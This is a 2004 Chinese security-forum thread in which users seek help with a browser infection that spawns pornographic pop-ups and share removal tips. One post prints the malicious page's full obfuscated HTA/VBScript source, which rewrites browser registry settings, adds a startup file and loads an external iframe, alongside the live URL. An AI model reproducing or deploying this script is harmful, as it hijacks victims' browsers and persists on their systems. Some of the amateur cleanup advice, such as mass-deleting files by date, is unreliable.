20CN网络安全小组论坛 - 病毒专区 - 求助，我中了个病毒。找不到EXE。注册表里找不到。怎么办？

论坛: 病毒专区标题: 求助，我中了个病毒。找不到EXE。注册表里找不到。怎么办？

复制本贴地址

作者: zml2236 [zml2236]

论坛用户

改病毒会不断的弹出色情网页。我该什么办？

地主发表时间: 04-05-22 02:02

回复: zml2236 [zml2236]

论坛用户

URL http://7fj.net/defaults1.asp
就是这个网页，没有信心的不要点。中了毒我不负任何责任和连带责任。
我下了他的ASP
但看不懂。
ASP 内容如下：
<html><HTA:APPLICATION CAPTION=no SHOWINTASKBAR=no WINDOWSTATE=minimize>
<title>Explorer</title>
<script language=VBScript.Encode>#@~^9AcAAA==@#@&WU,+MDWMPMn/!:nP +aO@#@&s!UmDkW ~Othbxc#@#@&^+x/1.+x AbNY4Qy!T!@#@&D'd1D+xctro4YQ Z!T@#@&:W7nKKPVSO@#@&D/rynPKPT~Z@#@&k+OPb:+G;DPEY4nSkUr~+!!Z!Z@#@&Ax[PwEU^DkW @#@&Dt+SrU@#@&/Y~0dG{Z.+mO+}4%n1Y`Ej1DrwDr o wk^+?H/Dn:}4%+1YEb@#@&/OPS'mMnCYW(LnmOcrhdmMrwDRd4VVEb@#@&AR"nT.bYPJ_|;i-UWWYSl.n'Hk1.WkW0Dw(xD+MxnY~3XwsWMnD'HCr -?OCMY~nmLJSrtDYw=zJAhSR0%0o ^K:zr@#@&SRIL DbYPECF/`-jW6OhmDnwtkm.GkWWY'( YnMxYPA6asWM+.-tlrU'skMdY,CWsn~nmoJSJ4ODwlzJAhSR{WNRmGhJJ@#@&S "+LqDbY+,J_FZ`-jW6YACM+-trmMW/KWO-qk NGhdw;E.DUYj+.dbWxwKKVrmbnk-jH/D+:'fbdl(VnIordDDX:GW^/JBEqJBJ"2!{9 }I9J@#@&hcInLqDkOn,Ju|;i'?G6YSlD-hGVbmr+k-\r1DWkG0D-q OnD +DP362sKDnD'/W Y.G^PnCUVwCKhnCT+r~J8JBEIAMmfqr]9r@#@&ax0kWRVnO?a+1kCVoG^NnDvq#LJw]m\KrhR4YmE@#@&jY,0P{P6dWcZ.+mYnP6YwrV`wB~PD!+*@#@&0 MkO+vE@!4Yhs@*@!CP)=bKnd(;bP&rgPZzn:(rg'UW,?u6qq1:)?nAb"xUW,&19r j:bP2{hk khr.+@*@!ObYs+@*3XwsKDD@!JYbOV@*@!/1Dr2DPVmUo!lox#AUmMk2Y 3 mGN@*a@$U?oTHb)){'@$a@$'qjS3HGHhH &"=xKd3l6@$[@$[kZjsf3q7=rDQ44am:@$[@$'73az8RQgXPb8HIc}XePe@$:@$[GBN8f/Q61YgDKce},}":@$a@$[)q{U|nnjQjr@$:@$[9QJ.X nFK:U}@$:@$[V_}K()QViGn2Ic j3`D=_e"tZ\@$a@$'bX$nS3i7G3qd@$a@$'GYQ?Mi@$[@$'&/5UT[V tR3h}_NW] F5#2NqfMh9DiW~A07_QuzGx))*Y_85A4@$a@$'JQ6nUv:tx/e/`JUsr^D4[sH.Sf"Nc/.j34@$a@$[zIE'1tDvfc*[J PgR(5/nB{kIbOiqe?^RUv_3F 0TfScXfQt6 5U2(Sdtx9B_Z.7 gr;\5?x:dgB?MYG5A'"BztjIZY!KP?F=yD@$:@$[jI&gdd9(5/n2;sJ|ONr4:9USY3s M0IvcdIxt6g5K)+ldtQR Ys.`B/V\95SZqd UUsW/9?xc}9h^yBb4?]`q1Is!tx9@$[@$'?,JLm4DcfW#'J3J;G4eQB9{ot#O%+ezZ\3ODD:tJF}O53i1!49hiA f/j5NQ N(XhF|#.s4U3 %CJfQlE04[sv.Uq/GMN9G(=M%zx$2$9$9r[^4M`&Wb[r "P178&,x@$:@$'41qUS$93}xSB!uirvQM5UsGQR4Mj4:M_0R-MF90MT9 ;d}Ufi_fhf k|Gx9B& i5 M%Kx;jg#SZ|4g ZP_M=x%B~2&bHs0$.TOD@$a@$[1!s")37r,tH09Qmx@$eDf/l/U&HsacG5AsL9M J1jg5L13vsA7I3_":J+nU3,rWBZSW_4KOfXK@$C@$Zy(!cV4x@$Mx4@$a@$'SSH$)z''?:?@$@!zk^MJQrkaY@*@!z4O:^@*E#@#@&W 1VWkn@#@&hR"nLMkD+~JuFA5mS}/bd{\);CqH3'?6s: zI3'HbmDK/KWY'rx9WAd'ZEM.+ Y..dkKx'I;xw]m\PksnJBP2@#@&NW^;s+UYcAMkO`r@!k6Dmh+,/.m{tOOa)zJ{0NRxO&N0mEsYd+cldw,Ak9Y4xZPtnrTtO'Z@*@!zr6Dm:+@*J*@#@&BXMCAA==^#~@</script>
</html>

[此贴被小明(zml2236) 在 05月22日02时07分编辑过]

B1层发表时间: 04-05-22 02:06

回复: uncracker [uncracker]

论坛用户

我也遇到过这个网站，它修改了注册表很多键，你打开比如说sohu.sina等网站。它就会弹出无数个黄色窗口。禁止了activeX才能暂时解决问题。在注册表里也找不到，用软件修复也没用。
不清楚她到底改了什么

B2层发表时间: 04-05-22 03:46

回复: fsqer [fsqer]

论坛用户

我的也是～高手帮忙解决一下～

B3层发表时间: 04-05-22 09:17

回复: zml2236 [zml2236]

论坛用户

禁止了activeX
会给浏览网页带来很多不便

B4层发表时间: 04-05-22 10:54

回复: fsqer [fsqer]

论坛用户

有没有人知道，告诉一下呀～

B5层发表时间: 04-05-24 08:24

回复: fsqer [fsqer]

论坛用户

ding

B6层发表时间: 04-05-26 15:10

回复: q8406654 [q8406654]

论坛用户

1.首先下载瑞星注册表修复器

[此贴被初生牛犊(q8406654) 在 05月26日19时24分编辑过]

[此贴被初生牛犊(q8406654) 在 05月28日14时52分编辑过]

B7层发表时间: 04-05-26 16:39

回复: zml2236 [zml2236]

论坛用户

谢谢,我看看去.

B8层发表时间: 04-05-26 20:50

回复: zml2236 [zml2236]

论坛用户

楼上的大哥，我中的这个毒好象没有你说的后面两个文件，我是在WIN的查找你里面找的。不知道你说的是不是这个意思。

还有你说的用SFC修复是什么意思啊？

我也下载了你说的瑞星注册表修复器，我搜到的是1.0的，不知道你说的是不是？
我看了看，这个东西好象只能修改注册表发生了改变的项，困惑中，求大哥明解！

B9层发表时间: 04-05-28 09:05

回复: q8406654 [q8406654]

论坛用户

先用瑞星修复在用日期查找比如你哪天的黄色网站你就从哪天找
进这个网页后你如果只用瑞星给注册表解锁的话你会在启动项发现RavTime.hta
查找到这个看他的属性是什么时候创建的在用查找功能按他创建的日期查找选创建日期
比如我是5月28号的就选介于5月28号和5月28 号查找
查找到后全部删除无法删除那就在安全模式下删除
删除后他会重新安装驱动程序的重装后用SFC修复下看有没有什么文件丢失
98就用SFC 如果是2000和XP的话用SFC/scannow

[此贴被初生牛犊(q8406654) 在 05月28日14时55分编辑过]

B10层发表时间: 04-05-28 14:03

回复: zml2236 [zml2236]

论坛用户

大哥，我按你说的办法做了，我开始查了700多个文件出来，当时我不敢删，后来我把系统时间调到一年后，再查找的，找的文件我全删了。还有个叫WIN386.SWP我是在安全模式下删的，可是重新启动SFC修复后，还是不行，病毒还是存在，我用WWW.QQ.COM试了试，病毒依然存在，

另外，我发现这种病毒是只要你打开个窗口，如果窗口中弹出窗口他就会发作，而且在进程中能找到N个Explorer进程，只有一个是真的，其他的根本没有区别，只有在杀掉这些进程，病毒才会暂时停止，太恶心了，这些人真是神经有问题。

B11层发表时间: 04-05-28 16:58

回复: q8406654 [q8406654]

论坛用户

有没有去了启动项呀就是RavTime.hta
清理下垃圾文件

[此贴被初生牛犊(q8406654) 在 05月28日22时37分编辑过]

B12层发表时间: 04-05-28 19:03